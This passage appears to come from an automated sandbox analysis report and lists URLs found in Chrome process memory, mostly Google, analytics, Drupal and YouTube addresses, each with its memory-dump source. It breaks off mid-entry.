                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2478072951.000028EC03020000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://semafor.com
                                  Source: chrome.exe, 00000000.00000002.2476347082.000028EC02DF0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494650570.000028EC045A4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
                                  Source: chrome.exe, 00000000.00000003.2323075165.000028EC03AF7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322834065.000028EC05158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322977322.000028EC03828000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/a/37825072/145846
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stats.g.doubleclick.net/g/collect
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stats.g.doubleclick.net/g/collect?v=2&
                                  Source: chrome.exe, 00000000.00000002.2472240524.000028EC0283C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome?p=desktop_tab_groups
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313568382.000028EC06F9D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://td.doubleclick.net
                                  Source: chrome.exe, 00000000.00000002.2494712430.000028EC045CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2344781235.000028EC07948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2344648335.000028EC067DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320493460.000028EC029A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://thrive.fohwtc.ca/thrive/request-a-speaker#request-speaker
                                  Source: chrome.exe, 00000000.00000003.2361293065.000028EC067ED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352813519.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400561655.000028EC06D49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500311139.000028EC06614000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://topkasynaonline.com/vulkanbet-bonus-bez-depozytu/
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://torneos.gg
                                  Source: chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504302862.000028EC078A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500209375.000028EC06578000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/FoHTHRIVE
                                  Source: chrome.exe, 00000000.00000002.2487690510.000028EC03BC4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488392167.000028EC03CA0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2344648335.000028EC067DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wellnessapp.ca/
                                  Source: chrome.exe, 00000000.00000002.2504370678.000028EC078C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504302862.000028EC078A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wellnessapp.ca/app/login
                                  Source: chrome.exe, 00000000.00000002.2484637468.000028EC0370C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400466181.000028EC07EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504142825.000028EC07868000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361169372.000028EC024D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361252175.000028EC04A3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400228006.000028EC024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.drupal.org)
                                  Source: chrome.exe, 00000000.00000002.2484637468.000028EC0370C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.drupal.org)X-Drupal-Cache:
                                  Source: chrome.exe, 00000000.00000003.2320348249.000028EC05C68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.drupal.org/core/deprecation#javascript
                                  Source: chrome.exe, 00000000.00000003.2320644460.000028EC06CBB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2319331070.000028EC06804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320841110.000028EC024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.drupal.org/node/2940704
                                  Source: chrome.exe, 00000000.00000003.2320746478.000028EC067DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320644460.000028EC06CBB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2319331070.000028EC06804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320841110.000028EC024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.drupal.org/node/3154948.
                                  Source: chrome.exe, 00000000.00000003.2344822174.000028EC047E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.drupal.org/project/bootstrap/issues/3013236
                                  Source: chrome.exe, 00000000.00000003.2320746478.000028EC067DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320644460.000028EC06CBB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2319331070.000028EC06804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320841110.000028EC024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.drupal.org/project/drupal/issues/2973400
                                  Source: chrome.exe, 00000000.00000003.2323075165.000028EC03AF7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322834065.000028EC05158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322977322.000028EC03828000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.drupal.org/project/webform/issues/2856795
                                  Source: chrome.exe, 00000000.00000003.2323075165.000028EC03AF7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322834065.000028EC05158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322977322.000028EC03828000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.drupal.org/project/webform/issues/3068998
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313568382.000028EC06F9D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                                  Source: chrome.exe, 00000000.00000003.2301202727.000028EC06240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486476343.000028EC039A4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2301090400.000028EC0497D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2475075490.000028EC02C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2474265467.000028EC02B50000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2301090400.000028EC04978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2474190232.000028EC02B3C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483787060.000028EC03640000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/ccm/collect
                                  Source: chrome.exe, 00000000.00000002.2475075490.000028EC02C28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/browser-features/
                                  Source: chrome.exe, 00000000.00000002.2475075490.000028EC02C28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/browser-tools/
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/release2/chrome_component/acdvcifl2ztime6bsz3eijtcfeaq_2025.5.15.1/kiabhab
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/neifaoindg
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/release2/chrome_component/l4z3clyi7urxnsu2inhaenyzam_2025.5.20.1303/ggkkeh
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/release2/chrome_component/l7xtcygg3vebugalfkm3b3dp3u_6.7431.9692/pkomkdjpm
                                  Source: chrome.exe, 00000000.00000002.2472240524.000028EC0283C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477907567.000028EC03017000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2473409026.000028EC02A34000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                                  Source: chrome.exe, 00000000.00000003.2332533118.000028EC06CE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2332565269.000028EC04794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348376359.000028EC05189000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498042478.000028EC052D4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2332607347.000028EC065E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2349100192.000028EC06404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js
                                  Source: chrome.exe, 00000000.00000003.2332533118.000028EC06CE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2332565269.000028EC04794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2332607347.000028EC065E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.jsaDb
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/pagead/1p-conversion
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/pagead/form-data
                                  Source: chrome.exe, 00000000.00000002.2469101930.000028EC0239C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_ZT0XGPL
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/travel/flights/click/conversion
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313568382.000028EC06F9D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleadservices.com
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleadservices.com/pagead/conversion
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
                                  Source: chrome.exe, 00000000.00000003.2313568382.000028EC06F9D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/a?
                                  Source: chrome.exe, 00000000.00000003.2400466181.000028EC07EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361169372.000028EC024D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2467653990.000028EC02270000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361252175.000028EC04A3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400228006.000028EC024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-WF39Z4TEVT
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/static/service_worker/
                                  Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348751663.000028EC05D4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2394122442.000028EC08004000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2508573423.000028EC07FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2394161248.000028EC07ED0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348751663.000028EC05D32000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2393958891.000028EC07FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2394042539.000028EC03530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2479146815.000028EC031B7000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348998445.000028EC05D0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348751663.000028EC05D8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484247572.000028EC036C8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2394204785.000028EC062E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499311995.000028EC062E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361413863.000028EC062E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/cv/js/sender/v1/cast_sender.js
                                  Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/cv/js/sender/v1/cast_sender.jsaDb
                                  Source: chrome.exe, 00000000.00000002.2481950611.000028EC033E0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348376359.000028EC05189000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2479146815.000028EC031B7000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343172211.000028EC06CB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/eureka/clank/134/cast_sender.js
                                  Source: chrome.exe, 00000000.00000002.2484400894.000028EC036F4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.jsdelivr.com/using-sri-with-dynamic-files
                                  Source: chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499247188.000028EC062C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mentalhealthns.ca/fountain-of-health
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.merchant-center-analytics.goog
                                  Source: chrome.exe, 00000000.00000003.2323075165.000028EC03AF7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322834065.000028EC05158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322977322.000028EC03828000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sitepoint.com/jquery-function-clear-form-data/
                                  Source: chrome.exe, 00000000.00000003.2343629747.000028EC062AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtbe.com/
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2369861259.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2469640808.000028EC02488000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348376359.000028EC05189000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341068096.000028EC06B20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484247572.000028EC036C8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2349100192.000028EC06404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC0458C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                                  Source: chrome.exe, 00000000.00000002.2484400894.000028EC036F9000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499890214.000028EC06438000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2362150726.000028EC05374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501436245.000028EC06920000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2438376642.000001E4AC843000.00000002.00000001.00040000.00000018.sdmp, chrome.exe, 00000000.00000002.2497831692.000028EC04E14000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483278146.000028EC035BC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2360579493.000028EC07D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487618019.000028EC03BAC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499247188.000028EC062C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481401055.000028EC0337C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2474598295.000028EC02B94000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500594658.000028EC06708000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494077088.000028EC04569000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2479725878.000028EC03244000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494650570.000028EC045A4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488508263.000028EC03CD0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483628964.000028EC03604000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483278146.000028EC035BC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481401055.000028EC0337C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
                                  Source: chrome.exe, 00000000.00000003.2323529169.000028EC04BB9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370154176.000028EC062EB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2369897325.000028EC07F03000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2323428029.000028EC04BD5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2323304427.000028EC06A9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si
                                  Source: chrome.exe, 00000000.00000002.2490083566.000028EC03F2C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2497731752.000028EC04DF8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=
                                  Source: chrome.exe, 00000000.00000002.2490083566.000028EC03F2C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=2rCuE23kHaX4E8A
                                  Source: chrome.exe, 00000000.00000002.2501891473.000028EC06D1C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2472240524.000028EC0283C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400418744.000028EC049D9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501943849.000028EC06D2C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2393532398.000028EC063EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2485773778.000028EC0386C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370451846.000028EC04B44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341110796.000028EC06320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 